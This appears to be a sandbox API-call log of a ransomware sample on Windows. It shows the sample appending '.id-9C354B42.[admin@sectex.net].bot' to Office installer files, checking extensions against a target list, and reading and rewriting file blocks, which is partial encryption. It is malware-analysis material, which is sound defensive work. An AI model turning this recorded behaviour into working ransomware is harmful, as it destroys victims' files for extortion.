	[0033.359] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20
	[0033.359] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.360] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0033.360] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.360] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.360] lstrlenW (lpString=".doc") returned 4
	[0033.360] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.360] lstrlenW (lpString=".docx") returned 5
	[0033.360] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.360] lstrlenW (lpString=".pdf") returned 4
	[0033.360] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.360] lstrlenW (lpString=".xls") returned 4
	[0033.360] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.360] lstrlenW (lpString=".xlsx") returned 5
	[0033.360] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.360] lstrlenW (lpString=".ppt") returned 4
	[0033.360] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.360] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.360] lstrlenW (lpString=".zip") returned 4
	[0033.360] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.360] lstrlenW (lpString=".rar") returned 4
	[0033.360] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.360] lstrlenW (lpString=".bz2") returned 4
	[0033.360] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.360] lstrlenW (lpString=".7z") returned 3
	[0033.360] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.360] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.360] lstrlenW (lpString=".dbf") returned 4
	[0033.360] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.360] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.360] lstrlenW (lpString=".1cd") returned 4
	[0033.360] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.360] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.360] lstrlenW (lpString=".jpg") returned 4
	[0033.360] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.361] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.361] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.361] lstrlenW (lpString=".doc") returned 4
	[0033.361] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.361] lstrlenW (lpString=".docx") returned 5
	[0033.361] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.361] lstrlenW (lpString=".pdf") returned 4
	[0033.361] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.361] lstrlenW (lpString=".xls") returned 4
	[0033.361] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.361] lstrlenW (lpString=".xlsx") returned 5
	[0033.361] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.361] lstrlenW (lpString=".ppt") returned 4
	[0033.361] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.361] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.362] lstrlenW (lpString=".zip") returned 4
	[0033.362] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.362] lstrlenW (lpString=".rar") returned 4
	[0033.362] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.362] lstrlenW (lpString=".bz2") returned 4
	[0033.362] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.362] lstrlenW (lpString=".7z") returned 3
	[0033.362] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.362] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.362] lstrlenW (lpString=".dbf") returned 4
	[0033.362] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.362] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.362] lstrlenW (lpString=".1cd") returned 4
	[0033.362] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.362] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0033.362] lstrlenW (lpString=".jpg") returned 4
	[0033.362] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.362] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0033.362] lstrlenW (lpString="PowerPointMUI.msi") returned 17
	[0033.362] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0033.363] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=2503680) returned 1
	[0033.363] CloseHandle (hObject=0x188) returned 1
	[0033.363] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi")) returned 0x2020
	[0033.363] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.363] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0033.364] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0033.364] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0033.364] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.364] ReadFile (in: hFile=0x188, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.372] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.372] ReadFile (in: hFile=0x188, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.384] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0033.384] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.384] ReadFile (in: hFile=0x188, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.403] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.403] WriteFile (in: hFile=0x188, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc010e, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc010e, lpOverlapped=0x0) returned 1
	[0033.621] SetEndOfFile (hFile=0x188) returned 1
	[0033.621] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb474720
	[0033.625] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0033.625] WriteFile (in: hFile=0x188, lpBuffer=0xb474720*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb474720*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0033.627] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0033.627] WriteFile (in: hFile=0x188, lpBuffer=0xb474720*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb474720*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0033.632] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0033.632] WriteFile (in: hFile=0x188, lpBuffer=0xb474720*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb474720*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0033.635] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb474720 | out: hHeap=0x7d60000) returned 1
	[0033.635] CloseHandle (hObject=0x188) returned 1
	[0034.239] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.239] lstrlenW (lpString=".doc") returned 4
	[0034.239] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0034.239] lstrlenW (lpString=".docx") returned 5
	[0034.239] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0034.239] lstrlenW (lpString=".pdf") returned 4
	[0034.239] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0034.239] lstrlenW (lpString=".xls") returned 4
	[0034.239] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0034.239] lstrlenW (lpString=".xlsx") returned 5
	[0034.239] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0034.239] lstrlenW (lpString=".ppt") returned 4
	[0034.239] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0034.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.239] lstrlenW (lpString=".zip") returned 4
	[0034.239] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0034.239] lstrlenW (lpString=".rar") returned 4
	[0034.239] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0034.239] lstrlenW (lpString=".bz2") returned 4
	[0034.239] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0034.240] lstrlenW (lpString=".7z") returned 3
	[0034.240] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0034.240] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.240] lstrlenW (lpString=".dbf") returned 4
	[0034.240] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0034.240] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.240] lstrlenW (lpString=".1cd") returned 4
	[0034.240] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0034.240] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.240] lstrlenW (lpString=".jpg") returned 4
	[0034.240] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0034.240] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.240] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.240] lstrlenW (lpString=".doc") returned 4
	[0034.240] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0034.240] lstrlenW (lpString=".docx") returned 5
	[0034.240] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0034.240] lstrlenW (lpString=".pdf") returned 4
	[0034.240] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0034.240] lstrlenW (lpString=".xls") returned 4
	[0034.240] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0034.240] lstrlenW (lpString=".xlsx") returned 5
	[0034.240] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0034.240] lstrlenW (lpString=".ppt") returned 4
	[0034.240] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0034.240] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.240] lstrlenW (lpString=".zip") returned 4
	[0034.240] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0034.240] lstrlenW (lpString=".rar") returned 4
	[0034.240] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0034.240] lstrlenW (lpString=".bz2") returned 4
	[0034.240] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0034.240] lstrlenW (lpString=".7z") returned 3
	[0034.240] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0034.241] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.241] lstrlenW (lpString=".dbf") returned 4
	[0034.241] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0034.241] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.241] lstrlenW (lpString=".1cd") returned 4
	[0034.241] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0034.241] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80
	[0034.241] lstrlenW (lpString=".jpg") returned 4
	[0034.241] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0034.241] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0034.241] lstrlenW (lpString="PublisherMUI.msi") returned 16
	[0034.241] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0034.241] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=2513920) returned 1
	[0034.241] CloseHandle (hObject=0x188) returned 1
	[0034.241] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 0x2020
	[0034.241] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.242] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0034.242] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0034.242] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0034.242] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0034.242] ReadFile (in: hFile=0x188, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0034.247] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0034.248] ReadFile (in: hFile=0x188, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0034.257] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0034.257] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0034.257] ReadFile (in: hFile=0x188, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0035.102] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.102] WriteFile (in: hFile=0x188, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc010c, lpOverlapped=0x0) returned 1
	[0035.120] SetEndOfFile (hFile=0x188) returned 1
	[0035.120] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4ab738
	[0035.269] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.269] WriteFile (in: hFile=0x188, lpBuffer=0xb4ab738*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4ab738*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.428] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.428] WriteFile (in: hFile=0x188, lpBuffer=0xb4ab738*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4ab738*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.434] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.434] WriteFile (in: hFile=0x188, lpBuffer=0xb4ab738*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4ab738*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.437] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4ab738 | out: hHeap=0x7d60000) returned 1
	[0035.441] CloseHandle (hObject=0x188) returned 1
	[0036.206] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0036.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.207] lstrlenW (lpString=".doc") returned 4
	[0036.207] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0036.207] lstrlenW (lpString=".docx") returned 5
	[0036.207] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0036.207] lstrlenW (lpString=".pdf") returned 4
	[0036.207] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0036.207] lstrlenW (lpString=".xls") returned 4
	[0036.207] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0036.207] lstrlenW (lpString=".xlsx") returned 5
	[0036.207] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0036.207] lstrlenW (lpString=".ppt") returned 4
	[0036.207] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0036.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.207] lstrlenW (lpString=".zip") returned 4
	[0036.207] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0036.207] lstrlenW (lpString=".rar") returned 4
	[0036.207] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0036.207] lstrlenW (lpString=".bz2") returned 4
	[0036.207] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0036.207] lstrlenW (lpString=".7z") returned 3
	[0036.207] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0036.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.207] lstrlenW (lpString=".dbf") returned 4
	[0036.207] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0036.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.208] lstrlenW (lpString=".1cd") returned 4
	[0036.208] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0036.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.208] lstrlenW (lpString=".jpg") returned 4
	[0036.208] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0036.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.208] lstrlenW (lpString=".doc") returned 4
	[0036.208] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0036.208] lstrlenW (lpString=".docx") returned 5
	[0036.208] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0036.208] lstrlenW (lpString=".pdf") returned 4
	[0036.208] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0036.208] lstrlenW (lpString=".xls") returned 4
	[0036.208] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0036.208] lstrlenW (lpString=".xlsx") returned 5
	[0036.208] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0036.208] lstrlenW (lpString=".ppt") returned 4
	[0036.208] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0036.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.208] lstrlenW (lpString=".zip") returned 4
	[0036.208] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0036.208] lstrlenW (lpString=".rar") returned 4
	[0036.208] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0036.208] lstrlenW (lpString=".bz2") returned 4
	[0036.208] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0036.208] lstrlenW (lpString=".7z") returned 3
	[0036.208] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0036.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.208] lstrlenW (lpString=".dbf") returned 4
	[0036.208] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0036.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.209] lstrlenW (lpString=".1cd") returned 4
